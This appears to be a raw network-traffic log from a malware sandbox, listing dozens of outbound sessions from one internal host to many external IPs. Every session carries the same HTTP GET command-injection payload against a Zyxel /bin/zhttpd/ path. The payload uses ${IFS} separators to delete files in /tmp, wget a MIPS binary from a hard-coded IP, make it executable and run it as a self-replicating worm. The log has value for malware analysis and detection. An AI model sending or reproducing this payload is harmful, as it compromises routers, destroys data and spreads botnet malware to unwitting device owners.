                                        Mar 31, 2024 09:21:03.644488096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3398192.168.2.2344838138.100.116.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644583941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3399192.168.2.234939089.14.40.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644634962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3400192.168.2.2333736180.63.146.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644675970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3401192.168.2.234333249.116.3.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644746065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3402192.168.2.2344012122.249.47.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644783974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3403192.168.2.2338296171.137.17.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644845009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3404192.168.2.234905481.232.74.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644897938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3405192.168.2.2339890149.88.56.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644947052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3406192.168.2.233581243.25.212.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645037889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3407192.168.2.235760614.92.213.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645091057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3408192.168.2.235475886.87.253.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645163059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3409192.168.2.2333200223.88.191.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645231009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3410192.168.2.2359110131.106.14.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645278931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3411192.168.2.2335152115.3.165.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645309925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3412192.168.2.2359340147.179.245.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645349026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3413192.168.2.235530235.70.105.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645373106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3414192.168.2.234012689.143.131.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645468950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3415192.168.2.2355456122.29.217.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645504951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3416192.168.2.2333892159.146.211.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645567894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3417192.168.2.2343106137.106.6.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645620108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3418192.168.2.2343192107.47.6.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645673037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3419192.168.2.235435619.42.204.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645730972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3420192.168.2.2333730160.60.227.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645777941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3421192.168.2.2346814135.230.123.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645812988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3422192.168.2.2350770180.204.133.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645859957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3423192.168.2.2351112142.38.39.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645891905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3424192.168.2.2357494190.79.70.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.645967007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3425192.168.2.235499898.203.101.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646007061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3426192.168.2.233617242.221.226.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646068096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3427192.168.2.2357666141.57.18.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646106005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3428192.168.2.235215263.199.124.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646145105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3429192.168.2.2338182119.98.80.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646200895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3430192.168.2.2351872114.204.204.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646260023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3431192.168.2.2352750129.173.82.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646298885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3432192.168.2.2343072151.231.79.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646343946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3433192.168.2.2359690104.72.183.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646380901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3434192.168.2.2354428208.150.204.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646425009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3435192.168.2.234824648.151.243.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646459103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3436192.168.2.234212224.94.161.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646538973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3437192.168.2.2352048120.176.157.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646570921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3438192.168.2.2341080153.67.54.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646629095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3439192.168.2.2354260159.248.217.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646673918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3440192.168.2.2344666221.218.189.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646728992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3441192.168.2.2351312117.187.222.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646776915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3442192.168.2.233977687.241.71.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646812916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3443192.168.2.2344652181.212.244.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646893978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3444192.168.2.233352857.32.255.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646945000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3445192.168.2.2351704187.117.109.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.646990061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3446192.168.2.233371865.150.44.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.647068977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3447192.168.2.2351630191.223.8.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.647124052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3448192.168.2.2350494158.134.255.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.647181988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3449192.168.2.2342356180.205.150.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.647252083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3450192.168.2.234711495.238.242.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.647293091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3451192.168.2.2336280205.128.104.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.647337914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3452192.168.2.2338276143.154.139.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.647382021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3453192.168.2.233913688.127.92.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.647435904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3454192.168.2.2339854145.89.148.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.647481918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3455192.168.2.235547083.67.190.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.657917023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3456192.168.2.2343638122.126.137.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.657960892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3457192.168.2.2337568124.156.64.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658021927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3458192.168.2.2349578213.165.70.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658082962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3459192.168.2.2358986136.84.224.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658145905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3460192.168.2.2335162217.62.156.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658198118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3461192.168.2.2347880124.48.237.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658283949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3462192.168.2.233470235.19.242.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658338070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3463192.168.2.2348868190.22.125.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658389091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3464192.168.2.235172624.164.158.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658448935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3465192.168.2.234325896.173.167.126443
                                        TimestampBytes transferredDirectionData
